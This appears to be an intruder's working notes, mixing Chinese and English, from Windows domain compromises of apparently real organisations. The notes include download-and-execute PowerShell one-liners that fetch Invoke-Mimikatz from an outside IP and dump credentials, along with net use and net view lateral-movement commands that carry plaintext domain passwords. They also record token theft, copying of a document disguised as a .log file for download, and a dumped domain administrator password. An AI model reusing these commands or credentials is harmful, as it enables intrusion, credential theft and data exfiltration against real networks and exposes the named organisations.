powershell 执行
windows 命令 wmic
http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html
命令: 可以 dump 出 密码来
powershell 脚本是 https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
1)becon 或者 meterpreter 先 getsystem
2)wmic process call create "powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" >d:2.txt"
直接2.txt 上的 dump 上有密码
设置linux console 快捷键 Command: gnome-terminal
先开启kali 服务 System service 开启 metasploit
下载 cobaltstrike http://www.advancedpentest.com/download
Net view命令用于查看远程主机的所有共享资源,其语法格式为: net view \IP地址
net view /domain 查看域帐户
net view /domain:JINDALSTEEL
net view /domain:JINDAL.AFRICA
whoami /groups 查询组下面的帐户 无用
net user /domain 查询域下帐户 无用
net group /domain 域下组 无用
net group "domain admins"/domain 上面查询的组的域信息 无用
shell cmd /c for %a in (WIN-DC,WIN-WALKER) do ping -n 1 %a >> info2.txt 看存活主机
shell cmd /c for /f %a in (info.txt) do ping -n 1 %a >> zend.txt
ps 看进程 steal_token pid SYSTEM权限
Net use命令把远程主机的某个共享资源映射为本地盘符以方便使用,其语法格式为: net use <驱动器盘符>: \IP地址sharename
net use Z: \192.168.10.210
ero
net use \ip(或者主机名)c$ 域帐户密码 /u:域域帐户
cmd /c for %a in (10.36.68.211,10.36.68.227,10.36.68.195,10.36.68.197,10.36.68.201,10.36.68.217)
do net use \%a jspl@BHARAT(密码) /u:jindalggn oot(域帐号) >> use.txt
dir \10.36.68.227c$
dir "\10.36.68.227c$Documents and settings" 看到电脑帐户jspladmin
net user jspladmin /domain
net use \10.36.68.195 /del
net use \10.36.68.195 Jin786Dal /u:jindalggnjspladmin
dir "\10.36.68.195c$Documents and settingsjspladminmy documents"
net view \10.36.68.211 看共享资源 然后查看
dir \10.36.68.211NASUtils
dir "\10.36.68.211work_station"
download \10.36.68.221work_stationBlock-IX .pptx
copy "\10.36.68.221work_stationBlock-IX .pptx" c:windows empwahaha.log
download wahaha.log
net time \127.0.0.1
net use 查看连接
2003 下不支持powershell
cmd /c powershell "IEX (New-Object Net.WebClient).DownloadString('http://107.170.234.111:80/download/index.ps1'); Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords"" > c:3.txt
* Username : Administrator
* Domain : TAIHE.COM
* Password : Domainadmin!@#
etherape 监控